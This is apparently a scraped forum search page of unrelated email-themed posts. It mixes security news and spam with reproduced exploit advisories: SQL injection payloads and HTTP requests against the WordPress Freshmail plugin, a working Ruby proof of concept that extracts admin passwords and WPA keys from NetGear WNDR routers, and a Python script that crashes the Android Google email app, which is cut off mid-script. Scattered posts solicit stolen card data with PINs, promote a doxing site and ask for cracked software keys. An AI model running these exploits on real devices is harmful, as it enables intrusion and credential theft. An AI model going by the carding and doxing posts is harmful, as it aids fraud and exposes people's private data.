Search the Community

Salut, imi poate scrie cineva send.php pentru: <div id="tooplate_main"> <h4>Contact Form</h4> <form method="post" name="contact" action="#"> <label for="author">Name:</label> <input type="text" id="author" name="author" class="required input_field" /> <div class="cleaner h10"></div> <label for="email">Email:</label> <input type="text" class="validate-email required input_field" name="email" id="email" /> <div class="cleaner h10"></div> <label for="subject">Subject:</label> <input type="text" class="validate-subject required input_field" name="subject" id="subject"/> <div class="cleaner h10"></div> <label for="text">Message:</label> <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea> <div class="cleaner h10"></div> <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" /> <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" /> </form> </div> </div> cu redirect catre 'mesajtrimis.html' Multumesc

Scammers use phishing emails to get consumers to click on links to websites they've created solely for the purpose of information theft. They trick users into typing their names, addresses, login IDs, passwords or credit card information into fields on sites that look like they belong to real companies. In some cases, just clicking the link provided in an email will automatically drop malware onto the user's device. Once the malware is installed, hackers can easily steal the victim's information without their knowledge. Phishers are getting better and better at making their traps look real, copying logos and creating sham urls and email addresses that look like actual corporate credentials. The Intel quiz displayed 10 real emails delivered to inboxes and collected by analysts at McAfee Labs, which is part of Intel Security. Some were legitimate correspondences from major companies, while others were phishing emails that look extremely believable. Of the 19,458 people who took the quiz, the vast majority -- 80 percent -- fell for at least one of the fake phishing emails they saw. Only 3 percent got a perfect score. Interestingly, the one email that was most often misidentified in the quiz was actually a legitimate letter. It raised false alarm bells by encouraging readers to claim free ads, a clicky turn of phrase that made people wary. Compared to the other 143 countries represented in the survey, the U.S. ranked 27th overall in ability to detect phishing. Americans' average 68 percent accuracy was just a few points above the global average. France, Sweden, Hungary, the Netherlands and Spain turned in the best performances. The results serve as yet another reminder to click with caution -- or not click at all. Intel Security's Gary Davis urged people to keep security software and browsers up to date to help weed out malicious sites and downloads, and to hover over links before clicking on them to make sure they point where they say they do. He also warned of obvious red flags, such as misspellings or bad grammar, that can help tip you off to a fraudulent correspondence. Want to see how you'd do on the quiz? You can try your hand at it above. If you don't score well, don't take it too hard. When Intel circulated an earlier version of it to Internet security professionals last year, 94 percent were fooled at least once. Source

------------------------ ISSUE 1: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL Injection vulnerability available for collaborators (or higher privileged users) for webs with freshmail plugin installed. The SQL Injection in located in the attribute "id" of the inserted shortcode [FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before inserting it in a SQL query. A collaborator can insert shortcodes when he/she is editing a new post or page and can preview the results (no administrator approval needed), launching this SQL Injection. 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/shortcode.php, lines 27 and 120: Line 19: function fm_form_func($atts) [...] Line 27: $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";'); [...] Line 120: add_shortcode('FM_form', 'fm_form_func'); 3. Proof of concept --------------------------- 1. As collaborator, start a new post. 2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b'] 3. Click preview. 4. If the form is shown, the statement is true, if not, false. POST /wp-admin/post.php HTTP/1.1 Host: <web> Content-Length: 3979 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: <web> User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_f305[...] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wpnonce" 0a75a3666b ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="user_ID" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="action" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="originalaction" editpost ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_author" 4 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_type" post ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_post_status" pending ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="referredby" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_wp_original_http_referer" http://<web>/wp-admin/post.php?post=69&action=edit&message=8 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_ID" 69 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="meta-box-order-nonce" f8aa04e508 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="closedpostboxesnonce" ebf65a43ed ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_title" Testing SQLi in shortcode ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="samplepermalinknonce" e753a2d8f2 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="content" [FM_form id='1" and substr(user(),1,1)="b] ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="wp-preview" dopreview ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="original_publish" Submit for Review ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_format" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 0 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="post_category[]" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="tax_input[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="newtag[post_tag]" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="excerpt" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="trackback_url" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyselect" #NONE# ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metakeyinput" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="metavalue" ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="_ajax_nonce-add-meta" 6a13a5a808 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="advanced_view" 1 ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="comment_status" open ------WebKitFormBoundary384PE6lRgBcOibkL Content-Disposition: form-data; name="ping_status" open ------WebKitFormBoundary384PE6lRgBcOibkL-- 5. Solution --------------- Update to version 1.6 ------------------------ ISSUE 2: # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source

Poti sa primesti o licenta pe viata pentru un autoposter profesional daca urmezi pasii de la acest link : Facebook Sharer PRO | Admin Login Totul incepe cu versiunea demo si adresa de email a unui prieten de-al tau ! Trebuie doar s fii foarte activ si vei primi foarte multe bobnusuri atractive ! Succes,

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for filter_wrapup callback. Various bug fixes, a typo fixed, and all perl function prototypes removed. Download Site: MIMEDefang | MIMEDefang

Please use the promotion code "dbm_free" to get one year free VPS hosting. Maximum one package per client. We will verify all orders manually. Please provide non-free email address or social network account in order to pass our verification. aHR0cDovL3d3dy52cHMtbWFydC5jb20vV2luZG93cy1WUFMuYXNweA==

Am cautat si tot cautat pe internet dar nu gasesc detalii si explicatii clare.Vreau sa lucrez la un server mail si intrebarea mea e de unde sa incep ? In mintea mea stau lucrarule cam asa : Website-ul propriu-zis unde userul isi face cont si primeste adresa de email -> socket sau ceva de genu -> server mail.Pentru serverul de mail cum ii atribui domeniul ca userul inregistrat sa aiba adresa de email user@domeniul.tld si cum se inregistreaza un email pe serverul propriu? Ce limbaj de programare ar fi mai indicat C# / C++ ?

Hello RST. I found a useful website to dox anyone using their email. This finds all their accounts signed up with this email, This includes, Facebook, imgur and much more! Please enjoy! http://com.lullar.com/

Following up on a promise it made during last summer’s Black Hat, Yahoo on Sunday said it’s on track to deliver end-to-end encryption for its email users this year. And to that end, it released the early source code for the Yahoo encryption browser extension to GitHub. Chief information security officer Alex Stamos made the announcement at the South by Southwest Festival, where he said he hopes the security community will pore over the code and submit any vulnerabilities to Yahoo’s Bug Bounty program. He also said that he hopes other email providers will build compatible solutions. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo also released a video, below, demonstrating the ease with which its encryption is deployed compared to GPG, a free and open source encryption implementation. Stamos hopes the solution, which he called “intuitive” would be available by the end of the year. “Anybody who has the ability to write an email should have no problem using our email encryption,” he said to AFP. Yahoo has made huge strides with its efforts to encrypt its web-based services beyond email, turning on HTTPS by default in January 2014 and four months later, encrypting traffic sent between its data centers. This was a weak spot known to be exploited by the National Security Agency, which was copying data from Yahoo and Google’s fiber-optic cables outside the United States. Last August during Black Hat, Stamos announced that Yahoo had partnered with Google on its efforts to encrypt email end to end in a fashion that would be transparent to users. Stamos said Yahoo would use the browser extension Google released in June that enables end-to-end encryption of all data leaving the browser. Stamos said at the time that Yahoo was working to ensure that its system works well with Google’s so that encrypted communications between Yahoo Mail and Gmail users will be simple. “I think anybody who uses email in the center of our life needs encryption,” Stamos said to AFP. “If you send emails to your spouse or your lawyer or family members, you want to have these messages be confidential.” Yahoo is also carrying over that same type of simplicity and intuitiveness to authentication. In addition on Sunday, it also announced a plan to ease the pain associated with passwords with the introduction of on-demand passwords. Director of product management Chris Stoner said in making the announcement that Yahoo users would no longer need to remember complex passwords to access their Yahoo accounts. Instead, once a user opts in to the on-demand password service, a verification code will be sent to the user’s mobile device that can be used to access their account. “It’s important for our products to be safe as used by normal people,” said Stamos. “Our users face a very diverse set of threats. The biggest threat is probably someone stealing their password, and their account taken over.” This article was corrected, correcting references of a plug-in to a browser extension. Source

AM PRIMIT REWARD DAR DUPA 2 ORE IMI VINE UN EMAIL CU "DUPLICATE " -.-" SERIOS ?

Yahoo! has offered $24,000 to a security researcher for finding out and reporting three critical security vulnerabilities in its products including Yahoo! Stores and Yahoo!-hosted websites. While testing all the company's application, Mark Litchfield, a bug bounty hunter who often works with different companies, discovered three critical vulnerabilities in Yahoo!'s products. All the three vulnerabilities have now been fixed by Yahoo!. THREE CRITICAL SECURITY VULNERABILITIES The first and most critical vulnerability gives hackers full administrator access to Yahoo!'s e-commerce platform, Yahoo! Small Business, a portal that allows small business owners to create their own web stores through Yahoo! and sell merchandise. According to the researcher, the flaw in the service allowed him to fully administrator any Yahoo store and thereby gain access to customers' personally identifiable information, including names, email addresses, telephone numbers. BUG ALLOWS FREE SHOPPING Beside allowing hackers full admin access to the web stores, the vulnerability could also leverage an attacker to rig a user-run eCommerce web store to let them shop for free, or at a huge discount, Litchfield claimed. A separate but related vulnerability in Yahoo! Stores, second flaw discovered by Litchfield, allows an unauthorized user to edit Yahoo-hosted stores through the app, thereby creating a means for hackers to hijack an online website store. Last but not the least, Litchfield discovered a critical vulnerability in Yahoo’s Small Business portal that allows hackers to seize administrative access to Yahoo!-hosted websites and gain full, unauthorized access to them. The Internet giant patched all the three bugs two weeks ago after Litchfield publicly released details and proof of concepts for the exploits on Bug Bounty HQ, a community for Bug Bounties website, established by Litchfield last month for fellow hunters to share their findings. 'ON DEMAND PASSWORD' At recent SXSW session, Yahoo! launched 'on-demand passwords,' which it says will eliminate the need for you to ever remember your email password. Whenever you need it, the company will send you a OTP (one time password) via SMS to your mobile phone. It's sort of two-factor authentication—without the first factor involved, as there is no need of any log-in password to enter by a user. In order to opt-in for the feature follow some simple steps: Sign in to your Yahoo email account. Click on your name at the top right corner to access your account information page. Choose Security in the sidebar. Click on the slider for on-demand passwords, in order to opt-in. Enter your phone number and Yahoo will send you a verification code. Enter the code. Now, next time whenever you will sign in into your email account, Yahoo will send a password via an SMS to your phone when you need it. Also, the end-to-end email encryption that Yahoo! promised will be available soon by the end of this year. The company gave its first demonstration of the locked down messaging system at SXSW session, and it is also delivering early source code for security researchers to analyze. Source

Am si eu nevoie de serial key pentru Fast Email Extractor Pro 5.1 . Ma poate ajuta cineva ????

URL: Anger Central - Where Angry People Come To Yell Metoda nu conteaz?. Chall-ul este valabil pân? la data de: 31 martie 2015. Chestii ce ar putea s? ajute: /ac/.htaccess /ac/.htpasswd /reports/index.php /stats/index.html /stats/.htaccess

cine ma poate imprumuta ? am nevoie urgenta acum, duminica dau withdraw la bitcoin si va dau inapoi prin btc. email: wirto.games2@yahoo.com multumesc din suflet celui care ma ajuta

Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. “Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and have an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack. Last summer during DEF CON, a hacking contest called SOHOpelessly Broken focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case, the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source

Email servers still compromised after THREE months An attack against US State Department servers is still ongoing three months after the agency spotted miscreants inside its email system, it's reported. In November the State Department was forced to suspend its unclassified email systems after it was successfully infiltrated by hackers unknown. At the time the agency said its classified emails were unaffected by the hack. Now Bloomberg and the Wall Street Journal report multiple sources saying that the attack is still ongoing: the bad guys and girls still have remote access to internal computers. Every time sysadmins find and delete a malware infection, installed by the hackers, another variant pops up. The point of failure was, we're told, a user clicking on a link to a dodgy website using an unpatched browser, leading to malicious remote-code execution. Once inside the network, the attackers spread out to the department's computers overseas, many of which now harbor malware. Remote access to email inboxes has been disabled, it's reported. IT staff can't switch off the network to freeze the infection because the computer systems must remain operation for security reasons. Five sources report that the attacks are Russian in origin, with one former US intelligence officer claiming that Putin’s online warriors are just as good as Uncle Sam's. The secure email system is reportedly still safe, but unclassified emails can contain lots of juicy information – and hackers could masquerade as officials on the network to gain access to more sensitive documents. Messages regarding US policy on the Ukraine, and other files, have been swiped from the system, two sources report. The difficulty in blocking further attacks raises worrying possibilities for the rest of the government’s IT managers. The State Department’s servers was compromised as part of large-scale attack against US government systems, with the White House, the US Postal Service, and the National Weather Service all falling prey, albeit briefly. “We deal successfully with thousands of attacks every day,” State Department spokeswoman Marie Harf told the Journal in a statement. “We take any possible cyber intrusion very serious - as we did with the one we discussed several months ago — and we deal with them in conjunction with other relevant government agencies.” Given the amount the US spends on information security these days it seems amazing that the NSA can’t rustle up a few of its hackers so adept at attacking and subverting legitimate means of communications and focus on defense for a change. Since 2001 the US has publicaly spent over $500bn on its intelligence services, and documents leaked by Edward Snowden show the NSA and CIA spent over $25bn in 2013 alone. It doesn’t seem as though the American taxpayer is getting value for money. Source

Just a moment... doar Email Adres.

cumpar CC + PIN + BANI PE ELE . astept email sau nr tel .

Am cautat pe tata google vreo 2 ore si nimic de negasit (GSA Email Verifier + Key ) ! Il are careva ?

>> NetGear WNDR Authentication Bypass / Information Disclosure Reported by: ---- Peter Adkins <peter.adkins () kernelpicnic.net> Access: ---- Local network; unauthenticated access. Remote network; unauthenticated access*. Tracking and identifiers: ---- CVE - Mitre contacted; not yet allocated. Platforms / Firmware confirmed affected: ---- NetGear WNDR3700v4 - V1.0.0.4SH NetGear WNDR3700v4 - V1.0.1.52 NetGear WNR2200 - V1.0.1.88 NetGear WNR2500 - V1.0.0.24 Additional platforms believed to be affected: ---- NetGear WNDR3800 NetGear WNDRMAC NetGear WPN824N NetGear WNDR4700 Vendor involvement: ---- 2015-01-18 - Initial contact with NetGear regarding vulnerability. 2015-01-18 - NetGear advised to email support with concerns. 2015-01-18 - Email sent to NetGear (support). 2015-01-19 - Email sent to Mitre. 2015-01-20 - NetGear (support) advised that a ticket had been created. 2015-01-21 - NetGear (support) requested product verification. 2015-01-21 - Replied to NetGear with information requested. 2015-01-23 - NetGear (support) requested clarification of model. 2015-01-23 - Replied to NetGear with list of affected models. 2015-01-27 - NetGear (support) replied with router security features. 2015-01-27 - Replied to NetGear and reiterated vulnerability. 2015-01-29 - Email sent to NetGear (OpenSource) regarding issue. 2015-01-30 - Case auto-closure email received from NetGear (support). 2015-02-01 - Reply from Mitre requesting additional information. 2015-02-01 - Email to Mitre with additional information. 2015-02-11 - Vulnerability published to Bugtraq and GitHub. Mitigation: ---- * Ensure remote / WAN management is disabled on the affected devices. * Only allow trusted devices access to the local network. Notes: ---- * These vulnerabilities can be leveraged "externally" over the internet, but require devices to have remote / WAN management enabled. * Due to the location of this issue (net-cgi) this vulnerability may be present in other devices and firmware revisions not listed in this document. * In the absence of a known security contact these issues were reported to NetGear support. The initial response from NetGear support was that despite these issues "the network should still stay secure" due to a number of built-in security features. Attempts to clarify the nature of this vulnerability with support were unsuccessful. This ticket has since been auto-closed while waiting for a follow up. A subsequent email sent to the NetGear 'OpenSource' contact has also gone unanswered. * If you have a NetGear device that is believed to be affected and can confirm whether the PoC works successfully, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings. ---- "Genie" SOAP Service ---- A number of NetGear WNDR devices contain an embedded SOAP service that is seemingly for use with the NetGear Genie application. This service allows for viewing and setting of certain router parameters, such as: * WLAN credentials and SSIDs. * Connected clients. * Guest WLAN credentials and SSIDs. * Parental control settings. At first glance, this service appears to be filtered and authenticated; HTTP requests with a `SOAPAction` header set but without a session identifier will yield a HTTP 401 error. However, a HTTP request with a blank form and a `SOAPAction` header is sufficient to execute certain requests and query information from the device. As this SOAP service is implemented by the built-in HTTP / CGI daemon, unauthenticated queries will also be answered over the internet if remote management has been enabled on the device. As a result, affected devices can be interrogated and hijacked with as little as a well placed HTTP query. The attached proof of concept uses this service in order to extract the administrator password, device serial number, WLAN details, and various details regarding clients currently connected to the device. A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR ---- Ruby PoC ---- require 'optparse' require 'nokogiri' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.1.1" options[:port] = 80 options[:ssl] = false OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.on("--[no-]ssl", "Destination uses SSL") do |s| options[:ssl] = s end option.parse! end # Define which SOAPActions we will be using. actions = [ { :name => "Fetch password", :call => "lan_config_security_get_info", :soap => "LANConfigSecurity:1#GetInfo" }, { :name => "Fetch WLAN", :call => "wlan_config_get_info", :soap => "WLANConfiguration:1#GetInfo" }, { :name => "Fetch WPA Security Keys", :call => "wlan_config_get_wpa_keys", :soap => "WLANConfiguration:1#GetWPASecurityKeys" }, { :name => "Fetch hardware", :call => "device_info_get_info", :soap => "DeviceInfo:1#GetInfo" }, { :name => "Fetch hardware", :call => "device_info_get_attached", :soap => "DeviceInfo:1#GetAttachDevice" } #{ # :name => "Dump configuration", # :call => "device_config_get_config_info", # :soap => "DeviceConfig:1#GetConfigInfo" #} ] def device_info_get_info(xml) puts "[*] Model Number: #{xml.xpath('//ModelName').text}" puts "[*] Serial Number: #{xml.xpath('//SerialNumber').text}" puts "[*] Firmware Version: #{xml.xpath('//Firmwareversion').text}" end def lan_config_security_get_info(xml) puts "[*] Admin Password: #{xml.xpath("//NewPassword").text}" end def wlan_config_get_info(xml) puts "[*] WLAN SSID: #{xml.xpath('//NewSSID').text}" puts "[*] WLAN Enc: #{xml.xpath('//NewBasicEncryptionModes').text}" end def wlan_config_get_wpa_keys(xml) puts "[*] WLAN WPA Key: #{xml.xpath('//NewWPAPassphrase').text} " end def device_config_get_config_info(xml) puts "[*] Base64 Config: #{xml.xpath('//NewConfigFile').text} " end def device_info_get_attached(xml) # Data is '@' delimited. devices = xml.xpath('//NewAttachDevice').text.split("@") devices.each_index do |i| # First element is a device count. if i == 0 next end # Split by ';' which pulls out the device IP, name and MAC. detail = devices[i].split(";") puts "[*] Attached: #{detail[2]} - #{detail[1]} (#{detail[3]})" end end # Form endpoint based on protocol, no path is required. if options[:ssl] endpoint = "https://#{options[:addr]}:#{options[:port]}/" else endpoint = "http://#{options[:addr]}:#{options[:port]}/" end # Iterate over all actions and attempt to execute. puts "[!] Attempting to extract information from #{endpoint}" actions.each do |action| # Build the target URL and setup the HTTP client object. request = RestClient::Resource.new( endpoint, :verify_ssl => OpenSSL::SSL::VERIFY_NONE) # Fire the request and ensure a 200 OKAY. begin response = request.post( { "" => "" }, { "SOAPAction" => "urn:NETGEAR-ROUTER:service:#{action[:soap]}"}) rescue puts "[!] Failed to query remote host." abort end if response.code != 200 puts "[-] '#{action[:name]}' failed with response: #{response.code}" next end # Parse XML document. xml = Nokogiri::XML(response.body()) if xml.xpath('//ResponseCode').text == '401' puts "[-] '#{action[:name]}' failed with a SOAP error (401)" next end # Send to the processor. send(action[:call], xml) end # FIN. Source

Summary: A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform an Denial Of Service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash just receive the malicious email. The CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer versions 4.2.2.0400 are not affected. Details and proof of concept exploit at: http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html Regards, Hector Marco. http://hmarco.org ---------------- Exploit crash_Android_Google_email_4.2.2.0200.py: #!/usr/bin/python ''' * $FILE: crash_Android_Google_email_4.2.2.0200.py * * $VERSION$ * * Authors: Hector Marco <hecmargi@upv.es> * Ismael Ripoll <iripoll@disca.upv.es> * * Date: Released 07 Jan 2015 * * Attack details: http://hmarco.org * * $LICENSE: * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ''' import smtplib from smtplib import SMTPException import sys import getopt #### START CONFIGURE ##### smtpServer = "" # set an appropriate SMTP server smtpServerPort = 25 # SMTP port, default 25 #### END CONFIGURE ##### sender = '' receivers = [] def usage(): print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0] sys.exit(2) def smtpNotConfigured(): print '\n[-] Error: Edit this script and set a SMTP server to send emails\n' sys.exit(2) def printHeader(): print "\nEmail Android Google 4.2.2.0200 crasher" print "=======================================" print "Author: Hector Marco <hmarco@hmarco.org>" print "Website: http://hmarco.org" def main(argv): global sender global receivers try: opts, args = getopt.getopt(argv,"hs:r:",["s=","r="]) if len(sys.argv) == 1: usage() except getopt.GetoptError: usage() for opt, arg in opts: if opt == '-h': usage() elif opt in ("-s", "--sender"): sender = arg elif opt in ("-r", "--receiver"): receivers.append(arg) if __name__ == "__main__": printHeader() if len(smtpServer) == 0: smtpNotConfigured() main(sys.argv[1:]) message = "From: Sender <%s>\n" % sender message += "To: Receiver <%s>\n" % receivers[0] message += """Subject: Crash test Content-Type: text/plain Content-Transfer-Encoding: 8BIT Content-Disposition: ; """ print "\n[+] Sending crafted message to: %s" % receivers[0] try: smtpObj = smtplib.SMTP(smtpServer, 